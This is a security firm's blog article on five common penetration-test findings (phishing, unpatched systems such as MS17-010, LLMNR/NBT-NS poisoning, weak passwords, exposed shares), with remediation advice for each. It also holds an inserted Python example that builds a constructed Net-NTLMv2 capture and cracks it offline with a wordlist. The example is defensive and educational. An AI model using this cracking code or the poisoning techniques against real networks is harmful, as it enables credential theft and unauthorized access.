Top 5 Penetration Testing Findings You Should Address to Keep Hackers at Bay
11/18/2020, Articles & Podcasts
When clients need to take steps to secure their environment, the myriad of systems, tools, processes, and procedures that could be implemented or enhanced can be overwhelming. Many organizations need a well-defined starting point before undertaking any new information security-related initiatives.
In DGC's penetration testing experience, addressing the five common findings outlined below closes a significant number of the technical gaps that attackers use to compromise your systems and users.
1. Social Engineering
Social engineering is the most common attack vector abused by hackers to gain initial access to your environment. Security awareness training is an absolute must!
It has been said before, and it will be said again: social engineering is the number one way that penetration testers (and real attackers) gain initial access to corporate environments. In general, this takes the form of unsolicited emails containing links to credential-harvesting pages that imitate a legitimate login, or attachments and downloads that deliver malware. From a technical perspective, every organization should implement robust email security controls, including spam filtering, rewriting and validation of links contained in emails, and automated scanning of attachments. Filtering alone, however, is a losing battle: attackers constantly find ways around these controls, and some malicious emails will reach users' inboxes. There is therefore no replacement for formal awareness training around social engineering. The best approach is to simulate phishing attacks, so that users are trained during their day-to-day activities to recognize and report phishing emails; track the report rate as well as the click rate, since a user who reports a real phish gives the security team a chance to contain it. DGC recommends a simulated phishing exercise together with formal awareness training to help organizations close this open front door for attackers.
2. High Profile Vulnerabilities
Well known and easily exploitable vulnerabilities leave your organization at risk from even the least sophisticated attackers. Formal system maintenance procedures are critical!
Once the DGC team has breached the perimeter via social engineering or another attack vector, the next piece of "low hanging fruit" is often an out-of-date operating system on the internal network. Over the past few years there have been a number of high-profile vulnerabilities that penetration testers (and real attackers) routinely leverage to breach individual systems. These vulnerabilities, the ones you hear about on the news, are useful to an attacker precisely because very reliable exploit code is publicly available for them, so any attacker, sophisticated or not, can use them to gain unauthorized access to unpatched systems. When we see even a single instance of a vulnerability like MS17-010, the Microsoft bulletin covering the SMBv1 flaws abused by the EternalBlue exploit and used by the world-wide WannaCry ransomware outbreak in 2017, we know we have an easy initial vector for exploitation and a foothold from which to stage further attacks (in the MS17-010 case, typically SYSTEM-level code execution on the target). Robust patching processes are a must to keep these vulnerabilities from introducing risk into an organization, and they should be paired with independent validation via periodic vulnerability scans. A scan that reports the patch as installed should also confirm that the legacy protocol (SMBv1 in this example) has been disabled, since the protocol itself is the attack surface. Vulnerability assessment services provide organizations with a baseline of vulnerability information across their entire network.
3. Internal Network Misconfigurations
Simple misconfigurations and deviations from best practice can leave user passwords vulnerable to interception. Undertake regular security assessments to identify and remediate this “low hanging fruit”!
Even on networks where administrators have implemented robust patching processes and all systems are up to date, there are usually still some simple attack vectors available to penetration testers and hackers alike. For example, there are standard mechanisms by which an attacker can recover user credentials just by listening on the network and answering the right queries. These techniques rely on the fact that most organizations have not disabled a set of old (and usually unnecessary) name-resolution protocols on the internal network. When DNS cannot resolve a name (a mistyped server name or a stale mapped drive is enough), Windows falls back to Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS), which broadcast the query to the local segment and accept the first answer. Neither protocol authenticates responses, so an attacker on the same segment can answer "that name is me", and the victim's machine will connect to the attacker's host and authenticate, typically over SMB with NTLM. What the attacker captures is not the password itself but an NTLM challenge-response (Net-NTLMv2 on current systems), a keyed hash derived from the user's password and the challenge. That capture can be cracked offline to recover the actual password, or, if the target servers do not require SMB signing, relayed straight to another host to authenticate as the victim without cracking anything. The fix is cheap: disable LLMNR through Group Policy, disable NetBIOS over TCP/IP on the network adapters, and require SMB signing. While many security firms that offer vulnerability assessment services simply run a scan, it is critical that they also review these additional common attack vectors and provide recommendations to close any identified gaps.
4. Poor Password Policies
Default passwords, weak password policies, and the use of passwords which are easily guessed can leave even well-secured systems vulnerable to unauthorized access. All organizations must implement “basic cyber hygiene”!
In the situation outlined above, the attacker usually still needs to "crack" a captured challenge-response in order to use the stolen credential. And even when credentials cannot be captured from the internal network, gaining access to a system is sometimes as simple as guessing a password: trying a handful of likely passwords (a season and the year, the company name, "Welcome1") against many accounts stays under lockout thresholds and is a routine step in our assessments. Whether the penetration tester (or hacker) cracks a captured hash offline or guesses a password by authenticating directly to a system, the only real protection at this point is the strength of those passwords. Length is the dominant factor in resisting cracking; complexity rules help only insofar as they keep users away from predictable patterns. Short passwords, and passwords built from a dictionary word plus a capital letter and a year, are cracked and guessed quickly no matter how many character classes they contain. An organization that has implemented a strong password policy, including a minimum length of at least 10 characters, an account lockout policy to blunt online guessing, and training for employees on how to select passwords that are not derived from dictionary words or company terms, is much better prepared to defend its network against these basic password attacks. All vulnerability assessments should include a review of the internal password policies, whether written or technically enforced via Active Directory Group Policy.
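The following Python is an added example, not code from the DGC article, serving both finding 3 (what an LLMNR/NBT-NS poisoner actually captures) and finding 4 (why only password strength remains as a defense). It builds a constructed Net-NTLMv2 capture in the layout a poisoner logs (the hashcat mode 5600 format) and then cracks it offline against a small wordlist with a few mangling rules. The MD4 and NTLMv2 computations follow RFC 1320 and MS-NLMP; the user names, domain, server challenge, client nonce, timestamp, AV pairs and wordlist are all constructed for the illustration. MD4 is implemented inline because hashlib's md4 is unavailable on many OpenSSL 3 builds.

```python
"""Net-NTLMv2 capture and offline crack (constructed walk-through, added example)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is disabled on many OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (message-word order, per-step shifts, boolean function, round constant)
        (range(16), (3, 7, 11, 19), f, 0),
        ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), g, 0x5A827999),
        ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), h, 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for order, shifts, fn, k in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates d, then c, then b
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. A poisoner never sees this value directly."""
    return md4(password.encode("utf-16le"))


def ntlmv2_response(password: str, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed with NTOWFv2 over ServerChallenge || blob."""
    ntlmv2_hash = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                           hashlib.md5).digest()
    return hmac.new(ntlmv2_hash, server_challenge + blob, hashlib.md5).digest()


def make_capture(user: str, domain: str, password: str,
                 server_challenge: bytes, client_nonce: bytes) -> str:
    """Build the line a poisoner would log, in hashcat -m 5600 layout:
    user::domain:server_challenge:NTProofStr:blob (hex fields after the names)."""
    # Constructed blob: version header, fixed FILETIME timestamp, client nonce,
    # one AV pair (NetBIOS domain name) and terminator. Values are illustrative only.
    av_pairs = struct.pack("<HH", 2, 2 * len(domain)) + domain.encode("utf-16le") + b"\x00" * 4
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", 132_000_000_000_000_000)
            + client_nonce + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = ntlmv2_response(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def candidates(wordlist):
    """Minimal mangling rules of the kind every cracker applies: the word as-is,
    capitalised, and capitalised with a recent year appended."""
    for w in wordlist:
        yield w
        yield w.capitalize()
        for year in ("2019", "2020"):
            yield w.capitalize() + year


def crack(capture: str, wordlist):
    """Offline guess loop: recompute NTProofStr for every candidate and compare.
    Nothing touches the network, so an account lockout policy cannot help here."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    chal, proof, blob = (bytes.fromhex(chal_hex), bytes.fromhex(proof_hex),
                         bytes.fromhex(blob_hex))
    for pw in candidates(wordlist):
        if hmac.compare_digest(ntlmv2_response(pw, user, domain, chal, blob), proof):
            return pw
    return None


WORDLIST = ["welcome", "summer", "password", "corp"]  # constructed stand-in for a real list

if __name__ == "__main__":
    chal = bytes.fromhex("1122334455667788")   # constructed server challenge
    nonce = bytes.fromhex("a1b2c3d4e5f60718")  # constructed client nonce
    weak = make_capture("jsmith", "CORP", "Summer2020", chal, nonce)
    strong = make_capture("adoe", "CORP", "plum-kettle-orbit-39", chal, nonce)
    print(weak)
    print("recovered:", crack(weak, WORDLIST))    # Summer2020: 10 chars, mixed case, digits, still falls
    print("recovered:", crack(strong, WORDLIST))  # None: not derivable from the list by these rules
```

Two points the code makes concrete: the capture is tied to a per-session challenge and client nonce, so it cannot be replayed later or used for pass-the-hash, which is why cracking (or live relay) is the attacker's only use for it; and "Summer2020" satisfies a 10-character, three-character-class policy yet falls to a four-word list with two trivial rules, which is why the training component of finding 4 matters as much as the technical policy.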
5. Sensitive Data Exposure
Organizations may inadvertently expose sensitive data on network shares or within poorly secured applications. Formal access management processes and periodic reviews of permissions are a requirement!
When all else fails, it is sometimes easiest just to poke around the network and look for data people have left "lying around". Attackers might get lucky and find a network share that doesn't require authentication, or one readable by every domain user, leaving the data stored there susceptible to unauthorized disclosure. Alternatively, while an organization may have secured its business applications with user passwords, it may have left the "back door" (direct database access) open to any user or protected with a default password, or stored the application's own database credentials in a configuration file on one of those shares. To an attacker it doesn't matter which route leads to the data, logging into the front end or querying the database on the back end; both result in the same exposure. An organization that does not undertake regular assessments is vulnerable to these issues because, as the network grows and changes, new permission mistakes and misconfigurations are introduced. During a vulnerability assessment or penetration test, the network should be reviewed for open and over-permissioned shares and for default credentials, to ensure the organization isn't handing sensitive data over on a silver platter.
All organizations must take steps to secure their information system assets. The amount of time and money that can be dedicated to the pursuit of information security is highly dependent on the size and maturity of the organization.
But what nearly every organization has in common is susceptibility to standard hacking tools, techniques, and procedures. Small and large organizations alike rely on technology to support critical business processes. Taking these relatively simple steps to close common attack vectors can have a profound impact on the true risk exposure to an organization.
During penetration testing assessments the DGC team regularly leverages the same techniques over and over to steal credentials, gain access to organizational systems, move laterally, and escalate privileges. By addressing these top 5 attack vectors, your organization will be better protected against penetration testers and hackers alike.